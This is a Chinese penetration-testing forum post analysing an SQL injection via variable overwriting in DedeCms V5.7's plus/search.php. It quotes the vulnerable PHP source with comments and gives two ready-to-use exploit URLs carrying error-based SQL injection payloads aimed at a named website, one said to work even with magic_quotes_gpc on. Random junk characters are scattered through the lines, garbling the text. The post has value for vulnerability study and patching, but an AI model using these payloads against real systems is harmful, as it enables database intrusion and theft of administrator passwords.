找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DedeCms V57 plus/search.php文件SQL注射
返回列表 发新帖
查看: 2835|回复: 0
打印 上一主题 下一主题

DedeCms V57 plus/search.php文件SQL注射

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-19 08:18:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.+ s/ B, X8 k& X6 P' x
作者: c4rp3nt3r@0x50sec.org; d0 w1 E  ?" Y+ r  }5 U* i
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.: {4 o. @% |! J

: `( B0 s; Z* Y' J$ b/ ?" \) o, O黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
6 p$ |) d1 y' Q( X# j ; |$ U9 Y) H. a* g4 x
============
0 R! F7 U" Y8 U. ?. _
3 v+ y; T" R( y: C ! M$ F* t8 i- f& V
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.. M  Q$ K7 p  |8 P

+ ^8 q6 S0 w- L# t) G" {require_once(dirname(__FILE__).”/../include/common.inc.php”);5 V3 [* s' K% L! G% Q
require_once(DEDEINC.”/arc.searchview.class.php”);
& K: ~( G+ L. j% J
9 o/ e( q; U8 R; j$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
1 A, e4 \; V( s0 g1 _: D" w$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
3 g+ g1 R! F& O  L3 q$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
; L) p. y9 r0 T$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;4 P! D6 y0 c2 g, e5 q- ~  y
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;. O' A" \  h' @0 c
3 c7 q4 u$ Z: e$ c  w. Y' ^
if(!isset($orderby)) $orderby=”;
1 O5 m) N/ ~3 j6 }else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);  T, N4 j/ _! i" L+ ~7 q
( k0 X  f" e0 A7 @" H: s) F& Y9 D3 `
* N6 v5 W: ?9 G, o# A- q' I
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;  d0 {7 b) v/ K
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
% B' V& l, f! @8 S/ L( D ! T" g3 |6 {" X4 l. T6 f$ @
if(!isset($keyword)){
" ~8 \/ {; _% O" e2 U    if(!isset($q)) $q = ”;
( R7 i+ N5 W  u' J    $keyword=$q;0 ?2 ^. H0 ?4 `0 p3 W
}) f; T8 m+ k+ r6 m
5 j) P$ R9 K: l  R0 l. y! }
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));6 u4 Z  W( k8 C% H) b9 q- z9 A, s
7 W, M) u% E; T/ o
//查找栏目信息: [1 X% h3 `& i
if(empty($typeid))
" }& \# p1 N: s0 z6 v{
3 ?! O0 I& F9 [3 {! S/ [    $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
. r- i: z3 q* q$ k' L( f    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )6 ^% \- o( A% k, X' M8 T# w6 C
    {1 L+ _( o  x' @( f6 p3 Z: B1 W
        $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
# `" R' I* I( W        fwrite($fp, “<”.”?php\r\n”);
& C# u" l9 G1 r+ M* Q# Q; h        $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
% V# \' V; {& d8 V4 D        $dsql->Execute();2 i" @/ _; B. C' H
        while($row = $dsql->GetArray())
, O- F' q  l* k( s$ ]        {+ I! _) g! W9 g
            fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);! [, [4 M. l6 D* K( G
        }
& P7 H5 k9 i% c; `) `        fwrite($fp, ‘?’.'>’);7 H; G. `4 X' t7 g
        fclose($fp);
' u3 U4 y& p. c( K    }' v  d  \$ O  ]- r
    //引入栏目缓存并看关键字是否有相关栏目内容1 e1 K: N8 s% \$ F8 U1 _% V. F
    require_once($typenameCacheFile);
$ x8 G$ |, m8 w//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
) a# H$ O" }+ b5 Y//
( O4 t, r2 m0 Z+ k4 |    if(isset($typeArr) && is_array($typeArr))
) B8 k- y7 x" ]4 w! T5 N4 E    {
' L8 J) t' I  g7 y) s- D6 s        foreach($typeArr as $id=>$typename)
$ ^- w2 Y4 q! Q, t5 H        {$ H. Z; B  u* u. s8 L) T

8 |- [' r& V2 ~# @            <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font>  //这个地方要绕过0 I% m7 V& R- [; x
            if($keyword != $keywordn)7 Y$ Q- q0 E3 r1 n" \: A1 p1 b9 L" Z
            {6 p( ?6 O: \# e& P, a+ H' @$ a
                $keyword = $keywordn;
$ _% d% z7 C8 D& h: u1 I. ?' h                <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设* _6 _6 q9 e) O8 \4 A4 n
                break;
9 V- A0 }. H' g( N! ^& R' c$ a2 ~; `            }
% s2 x4 X8 {: r( n1 a- i, p        }
: t3 ]- V4 y; L4 S4 e' q8 l    }
: h! R/ c4 p1 H/ |# D}( e6 I. q$ ]: N1 G/ D5 W0 J, A0 Q
然后plus/search.php文件下面定义了一个 Search类的对象 .2 G# V+ u# N$ D# ]5 T
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.+ p; l9 g- ]. ^  q4 p
$this->TypeLink = new TypeLink($typeid);
" D# q2 |7 I6 S' v" U9 K
7 g% x0 S6 N3 J; H7 \) P, TTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
( v3 e0 N) C% u) m) x, W! d
: E7 a( P4 C  S2 R" C$ y& }) pclass TypeLink
. o; c6 Q/ [/ n{
1 }8 e" _- a4 I' T$ i    var $typeDir;
# H- \3 a3 W8 l4 r6 E    var $dsql;
' C8 |7 K7 \( d  r* H    var $TypeID;2 }4 O% [2 ~+ R/ h- O* a4 N# |& W9 _
    var $baseDir;5 x" p$ V' ?' b0 V& o
    var $modDir;
! }% p% `! g+ Z" `* ]3 F    var $indexUrl;
2 O6 {; C6 L1 {! ]    var $indexName;8 e% |! Z! G0 D
    var $TypeInfos;
! p( T; J/ q# P- v4 C) W    var $SplitSymbol;
" P6 d& t$ W8 H3 s9 h/ Q: N    var $valuePosition;9 R- S( x" H) C0 c0 H5 R' U$ b
    var $valuePositionName;9 b3 F: b% e; \) X' g9 M7 Y
    var $OptionArrayList;//构造函数///////  D8 O' B( A" Y: w
    //php5构造函数$ z+ I# u0 s" p0 u
    function __construct($typeid)4 a- b2 Z. o- ?: k# s  l
    {
- ~: L& e5 X7 N; r6 U. q  [        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
7 H# f3 ^% c) P3 E9 Y# s# I# Z2 l        $this->indexName = $GLOBALS['cfg_indexname'];
, p+ _, L9 X0 B1 Z        $this->baseDir = $GLOBALS['cfg_basedir'];1 F( j" r! @( `3 H
        $this->modDir = $GLOBALS['cfg_templets_dir'];
3 S8 [- A7 V, t% ^2 J+ A$ b  M        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
' y2 X8 ^  {3 N) ]9 ?) ~% V  W        $this->dsql = $GLOBALS['dsql'];
5 J3 u3 s8 a+ C3 L2 V, L; u        $this->TypeID = $typeid;
0 ~, {0 @1 t' y        $this->valuePosition = ”;
% B5 N- v) Y0 i6 J/ I1 a        $this->valuePositionName = ”;% a) g( _1 o+ O, F0 z) H
        $this->typeDir = ”;/ i/ N3 v  F% v% U8 M! m8 E
        $this->OptionArrayList = ”;: V2 s* A) e# v( f. m
; C! f: a3 I2 H+ p# v
        //载入类目信息
4 L7 N1 {3 F( y* \( Y8 i " r  t  z4 D# L( x6 l' s
        <font color=”Red”>$query = “SELECT tp.*,ch.typename as  z; i0 V, Q+ M2 ^8 m6 i% i% z% N
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join% J% Q8 O8 Y; L3 S& L- C
`#@__channeltype` ch' ]3 O! d' U2 F/ P* W
        on ch.id=tp.channeltype  WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿5 N: Y0 U0 y+ T8 v( x

9 N# k" o2 M2 U        if($typeid > 0); C/ l! D6 G) ?8 }1 Z
        {* b7 u9 n0 @* G+ }; q
            $this->TypeInfos = $this->dsql->GetOne($query);
( L. @: g& p# _7 ~6 W利用代码一 需要 即使magic_quotes_gpc = Off& ^- Y4 x* `) Z. G  G; p

: g* c4 J+ W% J3 ], jwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
* ?' S) ^4 n+ ` ; V6 W- Z2 l+ Z( U2 ?
这只是其中一个利用代码… Search 类的构造函数再往下
5 A  u# c4 l# _" _! y: {
% M( I* X' r( b……省略. G$ P" a- e. j7 f
$this->TypeID = $typeid;" V3 V! }) a* E. e7 Z
……省略( s7 z" ?# [: a, v& I! }
if($this->TypeID==”0″){5 t' C  R4 v) T7 y3 Q6 Q, q
            $this->ChannelTypeid=1;' o- g, a. L. ?  j0 ~# ~
        }else{
7 _+ z' H; N9 m; Q& [            $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲: v9 X* t, E9 X) e- c7 g
//现在不鸡肋了吧亲…, g2 b3 s7 |' B7 L
            $this->ChannelTypeid=$row['channeltype'];( v' N; I; f3 M! i' @0 _' ^( Z

. G9 N& D+ ~- h4 e! P# @1 X        }
4 W' B8 B" |; n! U利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.- c8 c1 G1 v4 b9 D6 G# _
' `$ _! m) P; T0 |
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
1 a( ?! b4 a% L+ O! `' `( |
; Q; R: d3 a* d3 c7 E如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站: A$ s* d, V" {, Y: h/ l( F- V2 C
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表